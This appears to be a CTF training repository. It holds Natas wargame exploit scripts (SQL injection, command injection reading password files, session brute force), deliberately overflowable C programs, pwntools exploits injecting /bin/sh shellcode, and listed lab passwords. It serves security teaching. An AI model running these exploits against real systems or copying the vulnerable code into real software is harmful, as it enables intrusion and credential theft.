├── .gitignore ├── README.md ├── challenges ├── .DS_Store ├── Natas │ ├── Readme.md │ ├── natas15 │ │ └── exploit.py │ ├── natas16 │ │ └── exploit.py │ ├── natas17 │ │ └── exploit.py │ ├── natas18 │ │ └── exploit.py │ └── natas19 │ │ └── exploit.py ├── binary │ ├── .DS_Store │ ├── 01_deadbeef │ │ ├── .DS_Store │ │ ├── Makefile │ │ ├── deadbeef │ │ ├── deadbeef.c │ │ └── exploit.txt │ ├── 02_admin │ │ ├── Makefile │ │ ├── admin │ │ ├── admin.c │ │ └── exploit.txt │ ├── 03_EGG │ │ ├── .gdb_history │ │ ├── Makefile │ │ ├── egg │ │ ├── egg.c │ │ └── exploit │ ├── 04_L0g1n │ │ ├── .DS_Store │ │ ├── .gdb_history │ │ ├── Makefile │ │ ├── README.md │ │ ├── expl2.py │ │ ├── exploit.py │ │ ├── login │ │ └── login.c │ └── 05_N0t_0NLY_L0g1n │ │ ├── .DS_Store │ │ ├── .gdb_history │ │ ├── Makefile │ │ ├── README.md │ │ ├── expl2.py │ │ ├── exploit.py │ │ ├── login │ │ └── login.c └── web │ ├── 00_Canadian_FOI │ └── downloader.py │ ├── 01_Login_1 │ ├── requirements.txt │ ├── server.js │ └── solution.js │ └── 02_Login_3 │ ├── flag.txt │ ├── passwd.txt │ ├── server.py │ └── solution.py └── slides ├── 01_CTF WTF.pdf ├── 02_Binary exploitation 101.pdf ├── 03_Format_String_Attack.pdf ├── 04_WEB_101.pdf └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.gitignore.io/api/macos 2 | # Edit at https://www.gitignore.io/?templates=macos 3 | 4 | ### macOS ### 5 | # General 6 | .DS_Store 7 | .AppleDouble 8 | .LSOverride 9 | 10 | # Icon must end with two \r 11 | Icon 12 | 13 | # Thumbnails 14 | ._* 15 | 16 | # Files that might appear in the root of a volume 17 | .DocumentRevisions-V100 18 | .fseventsd 19 | .Spotlight-V100 20 | .TemporaryItems 21 | .Trashes 22 | .VolumeIcon.icns 23 | .com.apple.timemachine.donotpresent 24 | 25 | # Directories potentially created on remote AFP share 26 | .AppleDB 27 | .AppleDesktop 28 | Network Trash Folder 29 | Temporary Items 30 | .apdisk 31 | 32 | # End of https://www.gitignore.io/api/macos 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Risorse utili 2 | 3 | ## Wargames 4 | ### I wargames sono delle sfide a livelli, in cui risolvendo un livello si ottiene la password per il livello successivo 5 | - [OverTheWire](https://overthewire.org/wargames/) 6 | 7 | ## Challenges 8 | ### CTF sempre attive 9 | - [Hacker101 CTF](https://ctf.hacker101.com) 10 | - [Cyber Talents](https://cybertalents.com/challenges) 11 | 12 | ## Writeups 13 | - [CTF TIME](https://ctftime.org) - Ci sono i writeups delle CTF passate 14 | 15 | ## Tools 16 | - [ASCII to Hex](https://www.asciitohex.com/) - Convertitore tra diverse codifiche 17 | - [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) - Diversi attacchi automatizzati per Rsa 18 | - [RSA-Chinese-Remainder](https://github.com/JulesDT/RSA-Hastad) - Tool per effettuare Hastad attack (Broadcast Attack) 19 | 20 | ## Risorse per imparare roba 21 | ### Youtube 22 | - [Life Overflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - Hacking e CTF in generale 23 | - [Gynvael EN](https://www.youtube.com/user/GynvaelEN) - CTF 24 | - [IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) - _Hack the box_ walkthrough 25 | - [Hacker101](https://www.hacker101.com/videos) 26 | -------------------------------------------------------------------------------- /challenges/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/.DS_Store -------------------------------------------------------------------------------- /challenges/Natas/Readme.md: -------------------------------------------------------------------------------- 1 | Passwords of the Natas leveles: 2 | 3 | * **natas5**: `iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq` 4 | * **natas6**: `aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1` 5 | * **natas7**: `7z3hEENjQtflzgnT29q7wAvMNfZdh0i9` 6 | * **natas8**: `DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe` 7 | * **natas9**: `W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl` 8 | * **natas10**: `nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu` 9 | * **natas11**: `U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK` 10 | * **natas12**: `EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3` 11 | * **natas13**: `jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY` 12 | * **natas14**: `Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1` 13 | * **natas15**: `AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J` 14 | * **natas16**: `WaIHEacj63wnNIBROHeqi3p9t0m5nhmh` 15 | * **natas17**: `8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw` 16 | * **natas18**: `xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP` 17 | * **natas19**: `4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs` 18 | * **natas20**: `eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF` -------------------------------------------------------------------------------- /challenges/Natas/natas15/exploit.py: -------------------------------------------------------------------------------- 1 | 2 | import requests 3 | 4 | """ 5 | IMPORTANT Use python 2, otherwise .find doesn't work 6 | """ 7 | 8 | all_char = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 9 | 10 | found = False 11 | 12 | # Collate latin1_general_cs is used to make LIKE case sensitive 13 | # SQL injection 14 | query = 'natas16" and password COLLATE latin1_general_cs like "' 15 | 16 | # find your right authorization header in the request. 17 | header = { 18 | "Authorization": "Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==" 19 | } 20 | 21 | 22 | pswd = [] 23 | 24 | 25 | while found is False: 26 | new_char = False 27 | for char in all_char: 28 | # Try all charcters (int, uppercase and lowercase) 29 | tmp = "".join(pswd) + char 30 | # Make a request with the password injected in the username. 31 | res = requests.post(url="http://natas15.natas.labs.overthewire.org/index.php?debug", data={ 32 | "username": query + tmp + "%" 33 | }, headers=header) 34 | occurrence = res.content.find("doesn't exist") 35 | if occurrence == -1: 36 | # if the substring password matches, then we append the found new char to the result 37 | new_char = True 38 | pswd.append(char) 39 | print("".join(pswd)) 40 | break 41 | # If it has been found a character, then continue. Otherwise it means that the password has finished. 42 | if new_char is True: 43 | found = False 44 | else: 45 | found = True 46 | 47 | print ("The password is \n{}".format("".join(pswd))) 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /challenges/Natas/natas16/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib.parse 3 | import base64 4 | import time 5 | from pprint import pprint 6 | 7 | url = "http://natas16.natas.labs.overthewire.org/?needle={}&submit=Search" 8 | 9 | all_char = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 10 | 11 | header = { 12 | "Authorization": "Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA==" 13 | } 14 | 15 | 16 | def make_request(qry): 17 | res = requests.get(url=url.format( 18 | urllib.parse.quote_plus(qry)), headers=header) 19 | return res.content 20 | 21 | 22 | resp_dict = {} 23 | 24 | # fill the char dictionary with the query output 25 | for char in all_char: 26 | res = make_request(char) 27 | if res not in resp_dict.keys(): 28 | resp_dict[res] = [] 29 | resp_dict[res].append(char) 30 | 31 | flag_length = 32 # we know the standard flag length 32 | 33 | solution = [] 34 | 35 | for i in range(flag_length): 36 | qry = "$(dd status=none bs=1 skip={} count=1 if=/etc/natas_webpass/natas17)".format(i) 37 | res = make_request(qry) 38 | solution.append(resp_dict[res]) 39 | 40 | for i, l in enumerate(solution): 41 | print(i, l) 42 | 43 | 44 | pswd = "" 45 | idx = 18 #position of char A which appears only once 46 | 47 | for el in solution[idx:]: 48 | for pos in el: 49 | tmp = pswd + pos 50 | qry = "$(expr substr $(grep {} /etc/natas_webpass/natas17) 17 3)".format(tmp) 51 | res = make_request(qry) 52 | if "African" not in str(res): 53 | pswd = tmp 54 | print(pswd) 55 | break 56 | 57 | for el in range(idx, -1, -1): 58 | for pos in solution[el]: 59 | tmp = pos + pswd 60 | qry = "$(expr substr $(grep {} /etc/natas_webpass/natas17) 17 3)".format(tmp) 61 | res = make_request(qry) 62 | if "African" not in str(res): 63 | pswd = tmp 64 | print(pswd) 65 | break -------------------------------------------------------------------------------- /challenges/Natas/natas17/exploit.py: -------------------------------------------------------------------------------- 1 | 2 | import requests 3 | import time 4 | 5 | 6 | all_char = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 7 | 8 | found = False 9 | 10 | # Collate latin1_general_cs is used to make LIKE case sensitive 11 | # SQL injection 12 | query = 'natas18" and password COLLATE latin1_general_cs like "{}%" and sleep(3) and "1" = "1' 13 | 14 | header = { 15 | "Authorization": "Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw==" 16 | } 17 | 18 | 19 | pswd = [] 20 | 21 | 22 | while found is False: 23 | new_char = False 24 | for char in all_char: 25 | # Try all charcters (int, uppercase and lowercase) 26 | tmp = "".join(pswd) + char 27 | 28 | start_time = time.time() 29 | # Make a request with the password injected in the username. 30 | res = requests.post(url="http://natas17.natas.labs.overthewire.org/index.php?debug", data={ 31 | "username": query.format(tmp) 32 | }, headers=header) 33 | 34 | time_diff = time.time() - start_time 35 | if time_diff >= 1: 36 | # if the substring password matches, then we append the found new char to the result 37 | new_char = True 38 | pswd.append(char) 39 | print("".join(pswd)) 40 | break 41 | # If it has been found a character, then continue. Otherwise it means that the password has finished. 42 | if new_char is True: 43 | found = False 44 | else: 45 | found = True 46 | 47 | print ("The password is \n{}".format("".join(pswd))) 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /challenges/Natas/natas18/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | for i in range(640): 4 | header = { 5 | "Authorization": "Basic bmF0YXMxODp4dktJcURqeTRPUHY3d0NSZ0RsbWowcEZzQ3NEamhkUA==", 6 | "Cookie": "PHPSESSID=" + str(i) 7 | } 8 | 9 | res = requests.get( 10 | url="http://natas18.natas.labs.overthewire.org", headers=header) 11 | 12 | if "You are an admin" in str(res.content): 13 | start = str(res.content).index("Password: ") + 10 14 | password = str(res.content)[start:start+32] 15 | print("Password is: ", password) 16 | exit(0) 17 | -------------------------------------------------------------------------------- /challenges/Natas/natas19/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | for i in range(10): 4 | passwd0 = "3" + str(i) 5 | for j in range(10): 6 | passwd1 = passwd0 + "3" + str(j) 7 | for k in range(10): 8 | passwd = passwd1 + "3" + str(k) 9 | 10 | header = { 11 | "Authorization": "Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw==", 12 | "Cookie": "PHPSESSID=" + passwd + "2d61646d696e" 13 | } 14 | 15 | res = requests.get( 16 | url="http://natas19.natas.labs.overthewire.org", headers=header) 17 | 18 | if "You are an admin" in str(res.content): 19 | start = str(res.content).index("Password: ") + 10 20 | password = str(res.content)[start:start+32] 21 | print("Password is: ", password) 22 | exit(0) 23 | -------------------------------------------------------------------------------- /challenges/binary/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/.DS_Store -------------------------------------------------------------------------------- /challenges/binary/01_deadbeef/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/01_deadbeef/.DS_Store -------------------------------------------------------------------------------- /challenges/binary/01_deadbeef/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc deadbeef.c -o deadbeef -fno-stack-protector -z execstack -no-pie -m32 -g -fno-omit-frame-pointer 3 | -------------------------------------------------------------------------------- /challenges/binary/01_deadbeef/deadbeef: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/01_deadbeef/deadbeef -------------------------------------------------------------------------------- /challenges/binary/01_deadbeef/deadbeef.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | long val=0x41414141; 6 | char buf[20]; 7 | 8 | printf("Give me your name, please: "); 9 | scanf("%24s",&buf); //Ouch! 10 | 11 | printf("buf: %s\n",buf); 12 | printf("val: 0x%08x\n",val); 13 | 14 | if(val==0xdeadbeef){ 15 | printf("Well done\n"); 16 | exit(0); 17 | } 18 | else { 19 | printf("No way man!\n"); 20 | exit(1); 21 | } 22 | 23 | return 0; 24 | } 25 | -------------------------------------------------------------------------------- /challenges/binary/01_deadbeef/exploit.txt: -------------------------------------------------------------------------------- 1 | python -c 'print "B"*20 + "\xef\xbe\xad\xde"' | ./deadbeef 2 | -------------------------------------------------------------------------------- /challenges/binary/02_admin/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc admin.c -o admin -fno-stack-protector -z execstack -no-pie -m32 -g -fno-omit-frame-pointer 3 | -------------------------------------------------------------------------------- /challenges/binary/02_admin/admin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/02_admin/admin -------------------------------------------------------------------------------- /challenges/binary/02_admin/admin.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char const *argv[]) 4 | { 5 | int auth_code = 0; 6 | char username[16] = {0}; 7 | 8 | printf("Enter your username: "); 9 | fflush(stdout); 10 | scanf("%20s", username); /* Ouch! */ 11 | 12 | if (auth_code == 0x1337) 13 | { 14 | printf("Welcome back, admin!\n"); 15 | /* ... */ 16 | } 17 | else 18 | { 19 | printf("Welcome back, %s!\n", username); 20 | } 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /challenges/binary/02_admin/exploit.txt: -------------------------------------------------------------------------------- 1 | python -c 'print "A"*16+"\x37\x13"' | ./admin -------------------------------------------------------------------------------- /challenges/binary/03_EGG/.gdb_history: -------------------------------------------------------------------------------- 1 | disass main 2 | pd main 3 | help 4 | peda help 5 | disass main 6 | pd main 7 | pattern_create 8 | pattern_create 100 9 | pattern_create 100 10 | pattern_create 100 11 | pattern_offset 12 | pattern_offset 0x41416741 13 | -------------------------------------------------------------------------------- /challenges/binary/03_EGG/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc egg.c -o egg -fno-stack-protector -z execstack -no-pie -m32 -g -fno-omit-frame-pointer 3 | -------------------------------------------------------------------------------- /challenges/binary/03_EGG/egg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/03_EGG/egg -------------------------------------------------------------------------------- /challenges/binary/03_EGG/egg.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(){ 4 | int (*ret)(); 5 | 6 | if(getenv("EGG")==NULL){ 7 | printf("Give me something to execute at the env-variable EGG\n"); 8 | exit(1); 9 | } 10 | 11 | printf("Trying to execute EGG!\n"); 12 | ret = getenv("EGG"); 13 | ret(); 14 | 15 | return 0; 16 | } -------------------------------------------------------------------------------- /challenges/binary/03_EGG/exploit: -------------------------------------------------------------------------------- 1 | shellcode http://shell-storm.org/shellcode/files/shellcode-811.php 2 | 3 | export EGG=$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/04_L0g1n/.DS_Store -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/.gdb_history: -------------------------------------------------------------------------------- 1 | pd admin_menu 2 | pattern_create 100 3 | r 4 | pattern_offset 0x48414132 5 | r 6 | r 7 | r 8 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 9 | r 10 | -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc login.c -o login -fno-stack-protector -z execstack -no-pie -m32 -g -fno-omit-frame-pointer 3 | -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/README.md: -------------------------------------------------------------------------------- 1 | # 04\_L0g1n 2 | Someone told me he was able to became admin, was he joking right? 3 | 4 | To pass this challenge call the `admin_menu()` function. -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/expl2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | # -*- coding: utf-8 -*- 3 | 4 | from pwn import * 5 | context(arch='i386') 6 | rem = False 7 | if rem: 8 | io = remote('10.0.10.1', 31337) 9 | else: 10 | io = process('./login') 11 | 12 | admin_menu_addr = 0x08048581 13 | 14 | io.recvline() 15 | 16 | #io.sendline('A'*60 + "\x81\x85\x04\x08") 17 | io.sendline('A'*60 + p32(admin_menu_addr)) 18 | 19 | 20 | 21 | 22 | 23 | 24 | io.interactive() 25 | 26 | ''' 27 | 28 | s = io.recvuntil("") 29 | 30 | 31 | s = io.recvline() 32 | 33 | io.sendline(fit({32: p32(canary), 48: p32(0x08048a8c)})) #buffer overflow! 34 | 35 | io.interactive()''' -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -*- coding: utf-8 -*- 3 | 4 | from pwn import * 5 | context(arch='i386', os='linux') 6 | 7 | #io = remote('10.0.10.1', 31337) 8 | io = process('./login') 9 | 10 | admin_menu_addr = 0x08048581 #pd admin_menu 11 | 12 | 13 | #pattern_create 100 14 | # run in gdb with pattern as input 15 | #pattern_offset 0x48414132 16 | 17 | io.send('A'*60 + p32(admin_menu_addr)+"\n") 18 | 19 | io.interactive() 20 | -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/04_L0g1n/login -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/login.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int login() 5 | { 6 | char password[48] = {0}; 7 | printf("(password starts at address: %p)\n", password); 8 | 9 | printf("Please enter the admin password: "); 10 | fflush(stdout); 11 | 12 | gets(password); 13 | return 0; /* TODO implement proper authorization */ 14 | } 15 | 16 | void admin_menu() 17 | { 18 | printf("Welcome back, admin!\n"); 19 | /* ... */ 20 | exit(0); 21 | } 22 | 23 | int main(int argc, char const *argv[]) 24 | { 25 | int authorized = login(); 26 | if (authorized) 27 | { 28 | admin_menu(); 29 | } 30 | else 31 | { 32 | printf("Not authorized!\n"); 33 | } 34 | return 0; 35 | } 36 | -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/05_N0t_0NLY_L0g1n/.DS_Store -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/.gdb_history: -------------------------------------------------------------------------------- 1 | pd admin_menu 2 | pattern_create 100 3 | r 4 | pattern_offset 0x48414132 5 | r 6 | r 7 | r 8 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 9 | r 10 | -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc login.c -o login -fno-stack-protector -z execstack -no-pie -m32 -g -fno-omit-frame-pointer 3 | -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/README.md: -------------------------------------------------------------------------------- 1 | # 05\_N0t\_0NLY\_L0g1n 2 | Incredibly another friend of mine was able to spawn a sh3ll. Is he an h4ck3r or am I a n00b? 3 | 4 | To pass this challenge spawn a shell. (**Hint**: *shellcode*, *pwntools*) -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/expl2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | # -*- coding: utf-8 -*- 3 | 4 | from pwn import * 5 | context(arch='i386') 6 | rem = False 7 | if rem: 8 | io = remote('10.0.10.1', 31337) 9 | else: 10 | io = process('./login') 11 | 12 | shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' 13 | 14 | password_addr = int(io.recvline()[-12:-2],16) 15 | 16 | 17 | io.sendline(shellcode + 'A'*(60-len(shellcode)) + p32(password_addr)) 18 | 19 | 20 | 21 | 22 | 23 | 24 | io.interactive() 25 | 26 | ''' 27 | 28 | s = io.recvuntil("") 29 | 30 | 31 | s = io.recvline() 32 | 33 | io.sendline(fit({32: p32(canary), 48: p32(0x08048a8c)})) #buffer overflow! 34 | 35 | io.interactive()''' -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -*- coding: utf-8 -*- 3 | 4 | from pwn import * 5 | import struct 6 | context(arch='i386', os='linux') 7 | 8 | #io = remote('10.0.10.1', 31337) 9 | io = process('./login') 10 | 11 | psw_addr = int(io.recvuntil(")")[-11:-1], 16) 12 | #print hex(psw_addr) 13 | 14 | # pattern_create 100 15 | # run in gdb with pattern as input 16 | #pattern_offset 0x48414132 17 | 18 | shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" 19 | print len(shellcode + 'A'*(60-len(shellcode)) + p32(psw_addr)) # we want it ==64 20 | io.send(shellcode + 'A'*(60-len(shellcode)) + p32(psw_addr)+"\n") 21 | 22 | io.interactive() 23 | -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/05_N0t_0NLY_L0g1n/login -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/login.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int login() 5 | { 6 | char password[48] = {0}; 7 | printf("(password starts at address: %p)\n", password); 8 | 9 | printf("Please enter the admin password: "); 10 | fflush(stdout); 11 | 12 | gets(password); 13 | return 0; /* TODO implement proper authorization */ 14 | } 15 | 16 | void admin_menu() 17 | { 18 | printf("Welcome back, admin!\n"); 19 | /* ... */ 20 | exit(0); 21 | } 22 | 23 | int main(int argc, char const *argv[]) 24 | { 25 | int authorized = login(); 26 | if (authorized) 27 | { 28 | admin_menu(); 29 | } 30 | else 31 | { 32 | printf("Not authorized!\n"); 33 | } 34 | return 0; 35 | } 36 | -------------------------------------------------------------------------------- /challenges/web/00_Canadian_FOI/downloader.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from tqdm import tqdm 3 | 4 | baseurl = "http://foi.uni.hctf.fun/docs/document_" 5 | 6 | for number in tqdm(range(0, 999)): 7 | pdf_number = "0"*(3-len(str(number))) + str(number) 8 | 9 | url = baseurl + pdf_number + ".pdf" 10 | r = requests.get(url, stream=True) 11 | 12 | if r.status_code == 200: 13 | with open('./files/file_' + pdf_number + '.pdf', 'wb') as fd: 14 | for chunk in r: 15 | fd.write(chunk) 16 | -------------------------------------------------------------------------------- /challenges/web/01_Login_1/requirements.txt: -------------------------------------------------------------------------------- 1 | http 2 | crypto 3 | url 4 | fs 5 | -------------------------------------------------------------------------------- /challenges/web/01_Login_1/server.js: -------------------------------------------------------------------------------- 1 | var http = require('http'); 2 | const crypto = require('crypto'); 3 | var url = require('url'); 4 | var fs = require('fs'); 5 | 6 | var _0x86d1=["\x68\x65\x78","\x72\x61\x6E\x64\x6F\x6D\x42\x79\x74\x65\x73"]; 7 | 8 | function generatePart1() { 9 | return 10 | { 11 | x: crypto[_0x86d1[1]](8) 12 | 13 | }[x].toString(_0x86d1[0]); 14 | } 15 | function generatePart2() { 16 | return [+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]; 17 | } 18 | 19 | http.createServer(function (req, res) { 20 | res.writeHead(200, {'Content-Type': 'text/html'}); 21 | passwd = generatePart1() + generatePart2(); 22 | var url_content = url.parse(req.url, true); 23 | 24 | if (passwd == url_content.query.passwd) { 25 | res.write(fs.readFileSync('flag.txt', 'utf8')); 26 | } else { 27 | res.write('
'); 28 | } 29 | res.end(); 30 | }).listen(8888); 31 | -------------------------------------------------------------------------------- /challenges/web/01_Login_1/solution.js: -------------------------------------------------------------------------------- 1 | var request = require("request"); 2 | const crypto = require('crypto'); 3 | 4 | var _0x86d1=["\x68\x65\x78","\x72\x61\x6E\x64\x6F\x6D\x42\x79\x74\x65\x73"]; 5 | 6 | function generatePart1() { 7 | return 8 | { 9 | x: crypto[_0x86d1[1]](8) 10 | 11 | }[x].toString(_0x86d1[0]); 12 | } 13 | function generatePart2() { 14 | return [+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]; 15 | } 16 | 17 | passwd = generatePart1() + generatePart2(); 18 | 19 | var baseurl = "http://login1.uni.hctf.fun/?passwd="; 20 | request(baseurl + passwd, function(error, response, result) { 21 | console.log(result); 22 | }); 23 | -------------------------------------------------------------------------------- /challenges/web/02_Login_3/flag.txt: -------------------------------------------------------------------------------- 1 | 4_d4mn_l0ng_fl4g} 2 | -------------------------------------------------------------------------------- /challenges/web/02_Login_3/passwd.txt: -------------------------------------------------------------------------------- 1 | 007 2 | -------------------------------------------------------------------------------- /challenges/web/02_Login_3/server.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, send_from_directory 2 | 3 | app = Flask(__name__) 4 | 5 | passwd = open("./passwd.txt").read().split("\n")[0] 6 | flag = open("./flag.txt").read() 7 | 8 | 9 | @app.route('/') 10 | def index(): 11 | userpw = request.args.get("passwd", "") 12 | if userpw == passwd: 13 | return flag, 200, {"Content-Type": "text/plain"} 14 | else: 15 | return '
' 16 | 17 | 18 | if __name__ == '__main__': 19 | assert(len(passwd) == 3) 20 | assert(passwd.isdigit()) 21 | app.run() 22 | -------------------------------------------------------------------------------- /challenges/web/02_Login_3/solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import urllib2 3 | 4 | baseurl = "http://login3.uni.hctf.fun/?passwd=" 5 | for number in range(0, 999): 6 | pwd = "0"*(3-len(str(number))) + str(number) 7 | content = urllib2.urlopen(baseurl + pwd).read() 8 | if content.find("